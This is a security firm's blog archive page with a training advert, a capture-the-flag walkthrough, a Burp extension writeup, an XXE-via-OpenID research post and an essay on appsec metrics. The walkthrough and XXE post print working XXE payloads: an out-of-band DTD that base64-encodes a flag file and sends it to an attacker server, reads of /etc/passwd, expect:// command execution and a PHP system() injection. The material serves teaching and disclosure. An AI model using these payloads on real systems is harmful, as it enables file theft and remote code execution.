Grey bar Blue bar
Share this:

Mon, 9 Mar 2015

Break the Web at BlackHat Singapore

Web application security training in 2015?

It's a valid question we get asked sometimes. With the amount of books available on the subject, the tools that seemingly automate the process coupled with the fact that findings bugs in web apps should be harder now that frameworks and developers are more likely to produce secure code, is there a need to still train people up in the art of application exploitation?

Our response is yes. Our application assessment course constantly changes. We look at the thousands of assessments that we perform for our customers and take those vulnerabilities discovered, new architectures and designs and try and build practical exploitation scenarios for our students. We love breaking the web, the cloud, 'the box that's hosted somewhere you can't recall but just works', as there's always new approaches and methods one can take to own the application layer.

Last month I discovered a vulnerability in Redhat's OpenStack Platform. What was cool about this vulnerability is that it's not a new class of vulnerability but when deployed in an organisation, it allows an authenticated user the ability to read files on the filesystem with the permissions of the web server. Owning organisations is all about exploiting flaws and chaining them together to achieve the end goal.

We want to teach you the same process: from learning how to own the application layer whilst having fun doing it at BlackHat Asia - Singapore.

During the course we will have a view on:

  • Introduction to the hacker mindset (more important than it sounds!)

  • Reconnaissance techniques.

...and...breaking the web...

  • Understanding and exploiting data validation issues such as SQLi, XSS, XML and LDAP injections.

  • Session Management issues...oh cookies!

  • Attacking web services.

  • Glance of client-side technologies such as Silverlight, ActiveX.

This course will be hands on. It won't just be me standing up and speaking but you learning how to own web apps and exploit common vulnerabilities just like the best.

Come and join us! It will be fun :)




Fri, 27 Jun 2014

SensePost Challenge - Winners and Walkthrough

We recently ran our Black Hat challenge where the ultimate prize was a seat on one of our training courses at Black Hat this year. This would allow the winner to attend any one of the following:

The challenge was extremely well received and we received 6 successful entries and numerous other attempts. All the solutions were really awesome and we saw unique attacks, with the first three entrants all solving the challenge in a different way.


As stated, there are multiple ways of solving the challenge, we are just going to outline one way that hopefully provides multiple techniques which can be used in real-world pentests.

Flag 1:

The challenge started with the initial goal of "Read the file /home/spuser/flag1.txt" . When visiting the challenge website there were three initial pages available "index","about" and "login". We had numerous challengers head straight to the login page and attempt SQLi. The other common attack we saw was bruteforce attempts against the login. Both of these were fair attempts, however, the real point of interest should have been the "Feed tester" feature on the index page.

The index page had a feed tester feature, this allowed loading of external XML formatted feeds.
The index page had a feed tester feature, this allowed loading of external XML formatted feeds.

Simply trying out this feature and viewing how it functions. Viewing the feed tester result, we noticed that the contents of the XML formatted RSS feed were echoed and it became clear that this may be vulnerable to XXE. The first step would be to try a simple XML payload such as:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///home/spuser/flag1.txt" >]>

This would fail with an error message of "Something went wrong". The reason for this was that the application was attempting to parse the XML for valid RSS tags. Thus we need to alter our payload to conform to be a valid RSS feed (We used this as a template).

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE title [
<!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "file:///home/spuser/flag1.txt" >]>
<description>Free web building tutorials</description>
<title>RSS Tutorial</title>
<title>XML Tutorial</title>
<description>New XML tutorial on W3Schools</description>

And we should see the contents of flag1.txt displayed in our feed:
And we've captured flag1
And we've captured flag1 Now onto flag 2...

Flag 2:

The contents of flag1.txt revealed the "access code" we needed to log into the site. So we went over to the login page and entered an email address as the username and the access code as our password. Viola, we now have access to the "main" page as well. This page revealed some new functionality, namely the ability to update our user details. Unfortunately there was no upload function here, so there goes the easy shell upload. We updated the user account and used Burp to look at the submitted request.

The submitted POST request
The submitted POST request

It looks like we have some more XML being submitted.. Again we tried XXE and found that using "file://" in our payload created an error. There were ways around this, however the returned data would be truncated and we would not be able to see the full contents of flag2.txt... When stuck with XXE and not being able to see the result (or complete result) there is always the chance that we can get the data out via the network. To do this we needed to generate a payload that would allow us to fetch an external DTD and then "submit" the contents of our target file to a server under our control. Our payload on our server looked like this:

<!ENTITY % data SYSTEM "php://filter/read=convert.base64-encode/resource=/home/spuser/flag2.txt">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:8000/?%data;'>">

Note how we had to use the php://filter function to base64 encode our payload. This allowed us to avoid control characters breaking the XML structure and URL format. Finally, the payload submitted to the challenge server simply consisted of:

<?xml version="1.0" ?>
<!ENTITY % sp SYSTEM "http://x.x.x.x:8000/ev.xml">

We didn't really need to worry about what happens after our "XXE payload" because the xmldecoder had already submitted the contents of file2.txt to our server before the application code started parsing the XML document. When submitting the payload we needed to encode the % and & symbols otherwise these broke the XML decoder.

Our payload was correctly encoded submitted to the profile update function.
Our payload was correctly encoded submitted to the profile update function.

As soon as the XML decoder parsed our malicious payload, we would receive the base64 encoded contents on our server:

The challenge server would send the contents of flag2.txt to our server.
The challenge server would send the contents of flag2.txt to our server.

Now it was a simple matter of decoding the payload and we had the second flag. This was not the only way to get flag 2! It was the most "fun" way of doing it though and used a really handy method. Remember it for your next pentest...

Flag 3 AKA "get your name on the wall of fame":

Flag 2 gave us the access code we needed to unlock the final piece of the challenge. This presented us with the "add a feed" feature. Again, we first tried out the new feature to see what was happening. Our first observation was that nothing happens when we just add the feed. However, things do get interesting when we view our new feed. The new feed is displayed in a freshly generated php page. This should have triggered warning bells, we've got php being generated, how about we inject some php? Looking at the feed creation we again note that the payload consists of some XML being submitted. Now if we wanted to inject a shell, how would we do this without breaking the XML structure? Two options were available to us, one, encoding and two XML trickery. The encoding option was simple, simply encode all the angle brackets of our php payload and then insert it into our XML payload. This worked because php was kind enough to decode the URL encoded elements AFTER the XML decoder had done it's thing. Thus the XML validated successfully and our encoded characters got decoded back into their original form before being inserted into our new php file. The second option was to surround our php code with CDATA tags. The CDATA tags told the XML decoder not to parse the content surrounded by these tags as XML but rather treat it as free text. Simple enough and quicker than manually encoding our payload. Thus our new payload would look as follows:

<feed><name><![CDATA[<?php system('echo etienne >> /home/spuser/wof.txt') ?>]]></name><url></url></feed>

Now we had a new link created in the feeds list. We could navigate to this new feed and our php code would get executed as the page loaded. And boom, just like that our name should be on the "Wall of Fame". We could easily verify this by using the XXE from flag 1 and fetching /home/spuser/wof.txt instead. Below is the "Wall of Fame" at time of writing:

  • secdefect

  • Ron

  • ftard

  • send9 wuz here

  • @leonjza was here :)

  • harry@nsense was here 1403445693

  • #uushomo@1403472051

  • marquee was here

  • El Gato!El Gato!

  • melih_sarica_ms_isr_com_tr_was_here


Congratulations to everyone who finished the challenge! However, there could only be one winner. The winner is Espes, who narrowly beat our two runners up to win a training ticket for any one of our course at Black Hat Vegas 2014.

The two runners up who both can claim one of our awesome 2014 t-shirts:

Vitaly aka @send9

Sash aka @secdefect

Education is the most powerful weapon which you can use to change the world - Mandela
Education is the most powerful weapon which you can use to change the world - Nelson Mandela

Thu, 5 Jun 2014

Associating an identity with HTTP requests - a Burp extension

This is a tool that I have wanted to build for at least 5 years. Checking my archives, the earliest reference I can find is almost exactly 5 years ago, and I've been thinking about it for longer, I'm sure.

Finally it has made it out of my head, and into the real world!

Be free! Be free!

So, what does it do, and how does it do it?

The core idea for this tool comes from the realisation that, when reviewing how web applications work, it would help immensely to be able to know which user was actually making specific requests, rather than trying to just keep track of that information in your head (or not at all). Once you have an identity associated with a request, that enables more powerful analysis of the requests which have been made.

In particular, it allows the analyst to compare requests made by one user, to requests made by another user, even as those users log in and log out.

There are various ways in which users can be authenticated to web applications, and this extension doesn't try to handle them all, not just yet, anyway. It does handle the most common case, though, which is forms-based auth, with cookie-based session identifiers.

So, as a first step, it allows you to identify the "log in" action, extract the name of the user that is authenticating, and associate that identity with the session ID until it sees a "log out" action. Which is pretty useful in and of itself, I think. Who hasn't asked themselves, while reviewing a proxy history: "Now which user was I logged in as, when I made this request?" Or: "Where is that request that I made while logged in as 'admin'?"

Associating an identity with the requests

So, how does it do this? Unfortunately, the plugin doesn't have AI, or a vast database of applications all captured for you, with details of how to identify logins and logouts. But it does have the ability to define a set of rules, so you can tell it how your app behaves. These rules can be reviewed and edited in the "Options" tab of the Identity extension.

What sort of rules do we need? Well, to start with, what constitutes a valid logon? Typically, that may include something like "A POST to a specified URL, that gets a 200 response without the text 'login failed' in it". And we need to know which form field contains the username. Oh, and the sessionid in use by the application, so that the next time we see a sessionid with the same value, we can link that same identity to that conversation as well.

The easiest way to create the login rule is probably via the Http Proxy History tab. Just right click on a valid login request, and choose "Identity -> create login rule". It will automatically create a rule that matches the request method, request path, and the response status. Of course, you can customise it as you see fit, adding simple rules (just one condition), or complex rules (this AND that, this OR that), nested to arbitrary levels of complexity. And you can select the session id parameter name, and login parameter name on the Options tab as well.

Awesome! But how do we identify when the user logs out? Well, we need a rule for that as well, obviously. This can often be a lot simpler to identify. An easy technique is just to look for the text of the login form! If it is being displayed, you're very unlikely to be logged in, right? That can also catch the cases where a session gets timed out, but for the moment, we have separate rules and states for "logged out" and "timed out". That may not be strictly necessary, though. Again, these rules can be viewed and edited in the Options tab. Another easy way to create the logout rule is to select the relevant text in the response, right-click, and choose "Identity -> create logout rule".

Sweet! So now we can track a series of conversations from an anonymous user, through the login process, through the actions performed by the person who was logged in, through to the end of that session, whether by active logout, or by inactivity, and session timeout, back to an anonymous user.

Most interestingly, though, by putting the conversations into a "spreadsheet", and allowing you to create a pivot table of selected parameters vs the identity of the person making the request, it becomes possible to almost automate the testing of access control rules.

This tool is not quite at the "automated" stage yet, but it does currently allow you to see which user has performed which actions, on which subject, which makes it almost trivial to see what each user is able to do, and then formulate tests for the other users. You can also see which tests you have executed, as the various cells in the pivot table start filling up.

Pivoting requests against the user

In this screenshot, we are pivoting on the path of the URL, the method (GET vs POST), and then a bunch of parameters. In this application (WordPress, just for demonstration purposes), we want the "action" parameter, as well as the parameter identifying the blog post being operated on. The "action" parameter can appear in the URL, or in the Body of the request, and the "post" parameter in the URL identifies the blog post, but it is called post_ID in the body. (It might be handy to be able to link different parameters that mean the same thing, for future development!). The resulting table creates rows for each unique parameter combination, exactly as one would expect in an Excel pivot table.

Clicking on each cell allows you to get a list of all the conversations made by that userid, with the specific combination of parameters and values, regardless of the number of times that they had logged in and out, or how many times their session id changed. Clicking on each conversation in the list brings up the conversation details in the request/response windows at the bottom, so you can check the minutiae, and if desired, right-click and send them to the repeater for replay.

So far, the approach has been to manually copy and paste the session cookie for a different user into the repeater window before replaying the request, but this is definitely something that lends itself to automation. A future development will have an option to select "current" session tokens for identified users, and substitute those in the request before replaying it.

So far, so good! But, since the point of this extension is to check access controls, we'd ideally like to be able to say whether the replayed request was successful or not, right? There's a rule for that! Or there could be, if you defined them! By defining rules that identify "successful" requests vs "failed" requests, conversations can be tagged as successful or not, making it easier to see when reviewing lists of several conversations. Future development is intended to bring that data "up" into the pivot table too, possibly by means of colouring the cells based on the status of the conversations that match. That could end up showing a coloured matrix of successful requests for authorised users, and unsuccessful requests for unauthorised users, which, ultimately, is exactly what we want.

We'd love to hear how you get on with using this, or if you have any feature requests for the plugin. For now, the BurpId plugin is available here.

Tue, 28 Jan 2014

Revisting XXE and abusing protocols

Recently a security researcher reported a bug in Facebook that could potentially allow Remote Code Execution (RCE). His writeup of the incident is available here if you are interested. The thing that caught my attention about his writeup was not the fact that he had pwned Facebook or earned $33,500 doing it, but the fact that he used OpenID to accomplish this. After having a quick look at the output from the PoC and rereading the vulnerability description I had a pretty good idea of how the vulnerability was triggered and decided to see if any other platforms were vulnerable.

The basic premise behind the vulnerability is that when a user authenticates with a site using OpenID, that site does a 'discovery' of the user's identity. To accomplish this the server contacts the identity server specified by the user, downloads information regarding the identity endpoint and proceeds with authentication. There are two ways that a site may do this discovery process, either through HTML or a YADIS discovery. Now this is where it gets interesting, HTML look-up is simply a HTML document with some meta information contained in the head tags:

<link rel="openid.server" href="" />
<link rel="openid2.provider" href="" />
Whereas the Yadis discovery relies on a XRDS document:

    <Service priority="0">
Now if you have been paying attention the potential for exploitation should be jumping out at you. XRDS is simply XML and as you may know, when XML is used there is a good chance that an application may be vulnerable to exploitation via XML External Entity (XXE) processing. XXE is explained by OWASP and I'm not going to delve into it here, but the basic premise behind it is that you can specify entities in the XML DTD that when processed by an XML parser get interpreted and 'executed'.

From the description given by Reginaldo the vulnerability would be triggered by having the victim (Facebook) perform the YADIS discovery to a host we control. Our host would serve a tainted XRDS and our XXE would be triggered when the document was parsed by our victim. I whipped together a little PoC XRDS document that would cause the target host to request a second file (198.x.x.143:7806/success.txt) from a server under my control. I ensured that the tainted XRDS was well formed XML and would not cause the parser to fail (a quick check can be done by using

<?xml version="1.0" standalone="no"?>
  <!ELEMENT xrds:XRDS (XRD)>
  <!ATTLIST xrds:XRDS xmlns:xrds CDATA "xri://$xrds">
  <!ATTLIST xrds:XRDS xmlns:openid CDATA "">
  <!ATTLIST xrds:XRDS xmlns CDATA "xri://$xrd*($v*2.0)">
  <!ELEMENT XRD (Service)*>
  <!ELEMENT Service (Type,URI,openid:Delegate)>
  <!ATTLIST Service priority CDATA "0">
  <!ELEMENT openid:Delegate (#PCDATA)>
  <!ENTITY a SYSTEM 'http://198.x.x.143:7806/success.txt'>

<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns:openid="" xmlns="xri://$xrd*($v*2.0)"> <XRD> <Service priority="0"> <Type></Type> <URI>http://198.x.x.143:7806/raw.xml</URI> <openid:Delegate>http://198.x.x.143:7806/delegate</openid:Delegate> </Service> <Service priority="0"> <Type></Type> <URI>&a;</URI> <openid:Delegate>http://198.x.x.143:7806/delegate</openid:Delegate> </Service> </XRD> </xrds:XRDS>

In our example the fist <Service> element would parse correctly as a valid OpenID discovery, while the second <Service> element contains our XXE in the form of <URI>&a;</URI>. To test this we set spun up a standard LAMP instance on DigitalOcean and followed the official installation instructions for a popular, OpenSource, Social platform that allowed for OpenID authentication. And then we tried out our PoC.

"Testing for successful XXE"

It worked! The initial YADIS discovery (orange) was done by our victim (107.x.x.117) and we served up our tainted XRDS document. This resulted in our victim requesting the success.txt file (red). So now we know we have some XXE going on. Next we needed to turn this into something a little more useful and emulate Reginaldo's Facebook success. A small modification was made to our XXE payload by changing the Entity description for our 'a' entity as follows: <!ENTITY a SYSTEM 'php://filter/read=convert.base64-encode/resource=/etc/passwd'>. This will cause the PHP filter function to be applied to our input stream (the file read) before the text was rendered. This served two purposes, firstly to ensure the file we were reading to introduce any XML parsing errors and secondly to make the output a little more user friendly.

The first run with this modified payload didn't yield the expected results and simply resulted in the OpenID discovery being completed and my browser trying to download the identity file. A quick look at the URL, I realised that OpenID expected the identity server to automatically instruct the user's browser to return to the site which initiated the OpenID discovery. As I'd just created a simple python web server with no intelligence, this wasn't happening. Fortunately this behaviour could be emulated by hitting 'back' in the browser and then initiating the OpenID discovery again. Instead of attempting a new discovery, the victim host would use the cached identity response (with our tainted XRDS) and the result was returned in the URL.

"The simple python webserver didn't obey the redirect instruction in the URL and the browser would be stuck at the downloaded identity file."

"Hitting the back button and requesting OpenID login again would result in our XXE data being displayed in the URL."

Finally all we needed to do was base64 decode the result from the URL and we would have the contents of /etc/passwd.

"The decoded base64 string yielded the contents of /etc/passwd"

This left us with the ability to read *any* file on the filesystem, granted we knew the path and that the web server user had permissions to access that file. In the case of this particular platform, an interesting file to read would be config.php which yields the admin username+password as well as the mysql database credentials. The final trick was to try and turn this into RCE as was hinted in the Facebook disclosure. As the platform was written in PHP we could use the expect:// handler to execute code. <!ENTITY a SYSTEM 'expect://id'>, which should execute the system command 'id'. One dependency here is that the expect module is installed and loaded ( Not too sure how often this is the case but other attempts at RCE haven't been too successful. Armed with our new XRDS document we reenact our steps from above and we end up with some code execution.

"RCE - retrieving the current user id"

And Boom goes the dynamite.

All in all a really fun vulnerability to play with and a good reminder that data validation errors don't just occur in the obvious places. All data should be treated as untrusted and tainted, no matter where it originates from. To protect against this form of attack in PHP the following should be set when using the default XML parser:


A good document with PHP security tips can be found here:


Sun, 29 May 2011

Incorporating cost into appsec metrics for organisations

A longish post, but this wasn't going to fit into 140 characters. This is an argument pertaining to security metrics, with a statement that using pure vulnerability count-based metrics to talk about an organisation's application (in)security is insufficient, and suggests an alternative approach. Comments welcome.

Current metrics

Metrics and statistics are certainly interesting (none of those are infosec links). Within our industry, Verizon's Data Breach Investigations Report (DBIR) makes a splash each year, and Veracode are also receiving growing recognition for their State of Software Security (SOSS). Both are interesting to read and contain much insight. The DBIR specifically examines and records metrics for breaches, a post-hoc activity that only occurs once a series of vulnerabilities have been found and exploited by ruffians, while the SOSS provides insight into the opposing end of a system's life-cycle by automatically analysing applications before they are put into production (in a perfect world... no doubt they also examine apps that are already in production). Somewhat tangentially, Dr Geer wrote recently about a different metric for measuring the overall state of Cyber Security, we're currently at a 1021.6. Oh noes!

Apart from the two bookends (SOSS and DBIR), other metrics are also published.

From a testing perspective, WhiteHat releases perhaps the most well-known set of metrics for appsec bugs, and in years gone by, Corsaire released statistics covering their customers. Also in 2008, WASC undertook a project to provide metrics with data sourced from a number of companies, however this too has not seen recent activity (last edit on the site was over a year ago). WhiteHat's metrics measure the number of serious vulnerabilities in each site (High, Critical, Urgent) and then slice and dice this based on the vulnerability's classification, the organisation's size, and the vertical within which they lie. WhiteHat is also in the fairly unique position of being able to record remediation times with a higher granularity than appsec firms that engage with customers through projects rather than service contracts. Corsaire's approach was slightly different; they recorded metrics in terms of the classification of the vulnerability, its impact and the year within which the issue was found. Their report contained similar metrics to the WhiteHat report (e.g. % of apps with XSS), but the inclusion of data from multiple years permitted them to extract trends from their data. (No doubt WhiteHat have trending data, however in the last report it was absent). Lastly, WASC's approach is very similar to WhiteHat's, in that a point in time is selected and vulnerability counts according to impact and classification are provided for that point.

Essentially, each of these approaches uses a base metric of vulnerability tallies, which are then viewed from different angles (classification, time-series, impact). While the metrics are collected per-application, they are easily aggregated into organisations.

Drawback to current approaches

Problems with just counting bugs are well known. If I ask you to rate two organisations, the Ostrogoths and the Visigoths, on their effectiveness in developing secure applications, and I tell you that the Ostrogoths have 20 critical vulnerabilities across their applications, while the Visigoths only have 5, without further data it seems that the Visigoths have the lead. However, if we introduce the fact that the Visigoths have a single application in which all 5 issues appear, while the Ostrogoths spread their 20 bugs across 10 applications, then it's not so easy to crow for the Visigoths, who average 5 bugs per application as oppossed to the Ostrogoth's 2. Most reports take this into account, and report on a percentage of applications that exhibit a particular vulnerability (also seen as the probability that a randomly selected application will exhibit that issue). Unfortunately, even taking into account the number of applications is not sufficient; an organisation with 2 brochure-ware sites does not face the same risk as an organisation with 2 transaction-supporting financial applications, and this is where appsec metrics start to fray.

In the extreme edges of ideal metrics, the ability to factor in chains of vulnerabilities that individually present little risk, but combined is greater than the sum of the parts, would be fantastic. This aspect is ignored by most (including us), as a fruitful path isn't clear.

Why count in the first place?

Let's take a step back, and consider why we produce metrics; with the amount of data floating around, it's quite easy to extract information and publish, thereby earning a few PR points. However, are the metrics meaningful? The quick test is to ask whether they support decision making. For example, does it matter that external attackers were present in an overwhelming number incidents recorded in the DBIR? I suspect that this is an easy "yes", since this metric justifies shifting priorities to extend perimeter controls rather than rolling out NAC.

One could just as easily claim that absolute bug counts are irrelevant and that they need to be relative to some other scale; commonly the number of applications an organisation has. However in this case, if the metrics don't provide enough granularity to accurately position your organisation with respect to others that you actually care about, then they're worthless to you in decision making. What drives many of our customers is not where they stand in relation to every other organisation, but specifically their peers and competitors. It's slightly ironic that oftentimes the more metrics released, the less applicable they are to individual companies. As a bank, knowing you're in the top 10% of a sample of banking organisations means something; when you're in the highest 10% of a survey that includes WebGoat clones, the results are much less clear.

In Seven Myths About Information Security Metrics, Dr Hinson raises a number of interesting points about security metrics. They're mostly applicable to security awareness, however they also carry across into other security activities. At least two serve my selfish needs, so I'll quote them here:

Myth 1: Metrics must be “objective” and “tangible”

There is a subtle but important distinction between measuring subjective factors and measuring subjectively. It is relatively easy to measure “tangible” or objective things (the number of virus incidents, or the number of people trained). This normally gives a huge bias towards such metrics in most measurement systems, and a bias against measuring intangible things (such as level of security awareness). In fact, “intangible” or subjective things can be measured objectively, but we need to be reasonably smart about it (e.g., by using interviews,surveys and audits). Given the intangible nature of security awareness, it is definitely worth putting effort into the measurement of subjective factors, rather than relying entirely on easy-to-measure but largely irrelevant objective factors. [G Hinson]


Myth 3: We need absolute measurements

For some unfathomable reason, people often assume we need “absolute measures”—height in meters, weight in pounds, etc. This is nonsense!
If I line up the people in your department against a wall, I can easily tell who is tallest, with no rulers in sight. This yet again leads to an unnecessary bias in many measurement systems. In fact, relative values are often more useful than absolute scales, especially to drive improvement. Consider this for instance: “Tell me, on an (arbitrary) scale from one to ten, how security aware are the people in your department are? OK, I'll be back next month to ask you the same question!” We need not define the scale formally, as long as the person being asked (a) has his own mental model of the processes and (b) appreciates the need to improve them. We needn't even worry about minor variations in the scoring scale from month to month, as long as our objective of promoting improvement is met. Benchmarking and best practice transfer are good examples of this kind of thinking. “I don't expect us to be perfect, but I'd like us to be at least as good as standard X or company Y. [G Hinson]

While he writes from the view of an organisation trying to decide whether their security awareness program is yielding dividends, the core statements are applicable for organisations seeking to determine the efficacy of their software security program. I'm particularly drawn by two points: the first is that intangibles are as useful as concrete metrics, and the second is that absolute measurements aren't necessary, comparative ordering is sometimes enough.

Considering cost

It seems that one of the intangibles that currently published appsec metrics don't take into account, is cost to the attacker. No doubt behind each vulnerability's single impact rating are a multitude of factors that contribute, one of which may be something like "Complexity" or "Ease of Exploitation". However, measuring effort in this way is qualitative and only used as a component in the final rating. I'm suggesting that cost (interchangeable with effort) be incorporated into the base metric used when slicing datasets into views. This will allow you to understand the determination an attacker would require when facing one of your applications. Penetration testing companies are in a unique position to provide this estimate; a tester unleashed on an application project is time-bounded and throws their experience and knowledge at the app. At the end, one can start to estimate how much effort was required to produce the findings and, over time, gauge whether your testers are increasing their effort to find issues (stated differently, do they find fewer bugs in the same amount of time?). If these metrics don't move in the right direction, then one might conclude that your security practices are also not improving (providing material for decision making).

Measuring effort, or attacker cost, is not new to security but it's mostly done indirectly through the sale of exploits (e.g. iDefence, ZDI). Even here, effort is not directly related to the purchase price, which is also influenced by other factors such as the number of deployed targets etc. In any case, for custom applications that testers are mostly presented with, such public sources should be of little help (if your testers are submitting findings to ZDI, you have bigger problems). Every now and then, an exploit dev team will mention how long it took them to write an exploit for some weird Windows bug; these are always interesting data points, but are not specific enough for customers and the sample size is low.

Ideally, any measure of an attacker's cost can take into account both time and their exclusivity (or experience), however in practice this will be tough to gather from your testers. One could base it on their hourly rate, if your testing company differentiates between resources. In cases where they don't, or you're seeking to keep the metric simple, then another estimate for effort is the number of days spent on testing.

Returning to our sample companies, if the 5 vulnerabilities exposed in the Visigoth's each required, on average, a single day to find, while the Ostrogoth's 20 bugs average 5 days each, then the effort required by an attacker is minimised by choosing to target the Visigoths. In other words, one might argue that the Visigoths are more at risk than the Ostrogoths.

Metricload, take 1

In our first stab at incorporating effort, we selected an estimator of findings-per-day (or finding rate) to be the base metric against which the impact, classification, time-series and vertical attributes would be measured. From this, it's apparent that, subject to some minimum, the number of assessments performed is less important than the number of days worked. I don't yet have a way to answer what the minimum number of assessments should be, but it's clear that comparing two organisations where one has engaged with us 17 times and the other once, won't yield reliable results.

With this base metric, it's then possible to capture historical assessment data and provide both internal-looking metrics for an organisation as well as comparative metrics, if the testing company is also employed by your competitors. Internal metrics are the usual kinds (impact, classification, time-series), but the comparison option is very interesting. We're in the fortunate position of working with many top companies locally, and are able to compare competitors using this metric as a base. The actual ranking formulae is largely unimportant here. Naturally, data must be anonymised so as to protect names; one could provide the customer with their rank only. In this way, the customer has an independent notion of how their security activities rate against their peers without embarrassing the peers.

Inverting the findings-per-day metric provide the average number of days to find a particular class of vulnerability, or impact level. That is, if a client averages 0.7 High or Critical findings per testing day, then on average it takes us 1.4 days of testing to find an issue of great concern, which is an easy way of expressing the base metric.

What, me worry?

Without doubt, the findings-per-day estimator has drawbacks. For one, it doesn't take into consideration the tester's skill level (but this is also true of all appsec metrics published). This could be extended to include things like hourly rates, which indirectly measure skill. Also, the metric does not take into account functionality exposed by the site; if an organisation has only brochure-ware sites then it's unfair to compare them against transactional sites; this is mitigated at the time of analysis by comparing against peers rather than the entire sample group and also, to a degree, in the scoping of the project as a brochure-ware site would receive minimum testing time if scoped correctly.

As mentioned above, a minimum number of assessments would be needed before the metric is reliable; this is a hint at the deeper problems that randomly selected project days are not independent. An analyst stuck on a 4 week project is focused on a very small part of the broader organisation's application landscape. We counter this bias by including as many projects of the same type as possible.


If you can tease it out of them, finding rates could be an interesting method of comparing competing testing companies; ask "when testing companies of our size and vertical, what is your finding rate?", though there'd be little way to verify any claims. Can you foresee a day when testing companies advertise using their finding rate as the primary message? Perhaps...

This metric would also be very useful to include in each subsequent report for the customer, with every report containing an evaluation against their longterm vulnerability averages.

Field testing

Using the above findings-per-day metric as a base, we performed an historical analysis for a client on work performed over a number of years, with a focus on answering the following questions for them:
  1. On average, how long does it take to find issues at each Impact level (Critical down to Informational)?
  2. What are the trends for the various vulnerability classes? Does it take more or less time to find them year-on-year?
  3. What are the Top 10 issues they're currently facing?
  4. Where do they stand in relation to anonymised competitor data?
In preparation for the exercise, we had to capture a decent number of past reports, which was most time-consuming. What this highlighted for us was how paper-based reports and reporting is a serious hinderance to extracting useful data, and has provided impetus internally for us to look into alternatives. The derived statistics were presented to the client in a workshop, with representatives from a number of the customer's teams present. We had little insight into the background to many of the projects, and it was very interesting to hear the analysis and opinions that emerged as they digested the information. For example, one set of applications exhibited particularly poor metrics from a security standpoint. Someone highlighted the fact that these were outsourced applications, which raised a discussion within the client about the pros and cons on using third party developers. It also suggests that many further attributes can be attached to the data that is captured: internal or third party, development lifecycle model (is agile producing better code for you than other models?), team size, platforms, languages, frameworks etc.

As mentioned above, a key test for metrics is where they support decision making, and the feedback from the client was positive in this regard.

And now?

In summary, current security metrics as they relate to talking about an organisation's application security suffers from a resolution problem; they're not clear enough. Attacker effort is not modeled when discussing vulnerabilities, even though it's a significant factor when trying to get a handle on the ever slippery notion of risk. One approximation for attacker effort is to create a base-metric of the number of findings-per-day for a broad set of applications belonging to an organisation, and use those to evaluate which kinds of vulnerabilities are typically present while at the same time clarifying how much effort an attacker requires in order to exploit it.

This idea is still being fleshed out. If you're aware of previous work in this regard or have suggestions on how to improve it (even abandon it) please get in contact.

Oh, and if you've read this far and are looking for training, we're at BH in August.